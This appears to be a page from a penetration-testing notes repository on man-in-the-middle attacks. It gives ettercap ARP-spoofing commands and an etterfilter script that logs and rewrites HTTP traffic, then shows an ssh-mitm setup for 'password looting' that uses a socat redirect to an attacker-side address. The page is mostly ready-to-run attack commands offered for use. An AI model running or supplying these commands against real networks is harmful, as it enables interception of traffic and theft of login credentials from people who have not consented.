whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Post Exploitation/Man in the Middle.md

1.2 KiB
Raw Blame History

Man In the Middle

Ettercap

  • Ettercap

  • Bettercap

  • ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches

ettercap -T -i <interface> -M arp
  • Etterfilter can filter and restructure packets
man etterfilter

if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
  • Escape double quote inside the payload string
  • compile via
etterfilter filter.ef -o filter.ef
  • Run the filter via
ettercap -T -i <interface> -M arp -F filter.ef

mitm-server

Set up a local Man in the middle server which can be used for example for password looting if somebody logs in. SSH-MITM provides this feature. Therefore, download the package via pip install ssh-mitm.

Redirect the port to the mitm server and start it afterwards

((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)

ssh-mitm server --remote-host $TARGET_IP